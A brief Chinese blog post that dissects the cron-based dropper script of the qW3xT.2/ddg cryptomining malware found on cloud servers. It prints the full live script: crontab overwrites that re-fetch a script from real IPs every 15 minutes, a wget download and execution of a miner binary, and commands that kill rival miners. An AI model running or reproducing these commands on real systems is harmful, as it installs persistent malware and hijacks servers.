qW3xT.2挖礦病毒指令碼解析
阿新 • • 發佈:2018-12-27
最近有兩臺阿里雲伺服器中了挖礦病毒,CPU佔用率一直百分百。本帖就不詳細說明如何清除了,網上很多資源。由於好奇,我把該病毒的定時指令碼給下載下來,大家可以學習一下。
中了招的主機,在計劃任務中都有這麼一段:
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh意思是下載i.sh指令碼並重定向到sh去執行。於是我就下載該指令碼,並把原文先貼出來供大家批判性學習:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/root echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014 if [ ! -f "/tmp/ddgs.3014" ]; then wget -q http://13.113.240.221:8000/static/3014/ddgs.$(uname -m) -O /tmp/ddgs.3014 fi chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
這個指令碼挺簡單的,我看了沒什麼問題。各位看官如果有什麼以為,可以留言討論哈。